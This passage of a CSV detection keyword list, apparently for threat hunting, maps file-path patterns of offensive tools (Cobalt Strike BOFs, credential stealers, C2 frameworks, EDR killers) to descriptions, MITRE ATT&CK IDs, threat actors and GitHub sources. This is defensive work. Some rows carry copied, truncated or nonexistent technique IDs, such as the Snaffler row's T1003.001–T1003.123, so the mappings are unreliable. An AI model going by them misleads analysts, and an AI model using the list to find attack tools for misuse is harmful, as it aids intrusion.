T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServerScanForWindows/PE*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/ServiceMove-BOF/*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*/ServiceName:TokenDriver*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/Services/TransitEXE.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/servicetags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SessionSearcher.exe*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/SetProcessInjection.git*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*/setuserpass.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/setuserpass.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/sfp_openphish.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/sfp_spider.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A 
-*/sh_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/s-h-3-l-l/*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*/shadowcoerce.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ShadowForgeC2*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*/ShadowSpray.git*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*/ShadowSpray/*.cs*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - 
T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*/share/windows-resources/wce*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*/share_enum.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ShareFinder.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 
- T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/Sharefinder.ps1,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/shares-with-SCF.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/SharpAzbelt.git*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*/SharpBlackout.git*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/SharpCalendar/*.*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z -*/SharpCat/*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*/SharpChromium.git*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*/SharpCloud.git*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential 
Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*/SharpCollection/*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/SharpCompile/*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*/sharpcompile_*.*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*/SharpCradle/*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*/SharpDomainSpray.git*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*/SharpDoor.cs*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*/SharpDoor.git*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*/SharpDPAPI.git*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*/SharpDump*,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*/SharpExfiltrate.git*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*/SharpExfiltrate/*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data 